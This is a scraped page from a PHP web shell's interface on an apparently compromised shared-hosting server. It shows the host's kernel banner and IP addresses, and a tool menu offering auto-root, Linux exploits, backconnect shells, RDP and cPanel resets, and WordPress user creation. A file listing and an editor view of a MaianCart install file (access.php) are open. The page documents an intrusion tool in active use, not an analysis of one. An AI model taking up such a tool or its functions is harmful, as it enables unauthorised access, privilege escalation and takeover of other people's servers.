Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.142.250.86
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
maiancart /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
access.php
813
B
-rw-r--r--
changelog.txt
4.36
KB
-rw-r--r--
clone.php
5.86
KB
-rw-r--r--
connect.php
4.39
KB
-rw-r--r--
edit.php
3.48
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
129
B
-rw-r--r--
import.php
3.39
KB
-rw-r--r--
info.xml
3.53
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.78
KB
-rw-r--r--
install.xml
1.62
KB
-rw-r--r--
md5
6.64
KB
-rw-r--r--
notes.txt
387
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : access.php
<?php /* ADMINISTRATIVE USERNAME/PASSWORD Set username/password here for initial install. For security you can remove these entries if you wish to prevent them from being used. Or comment them out. If you need to enter the system again later as the administrative user, uncomment or re-create. You can also remove the 'access.php' file completely for further security. Ideal for developers to set up the system. NOTE. You must create additional users in the admin area before removing this file or data in this file or else you will not be able to access the system. If this happens, replace this file. */ define('USERNAME', '[[admin_username]]'); define('PASSWORD', '[[admin_pass]]'); /* Enter IP addresses (comma delimited) for IP restriction on login */ define('RESTRICT_BY_IP', ''); ?>
Close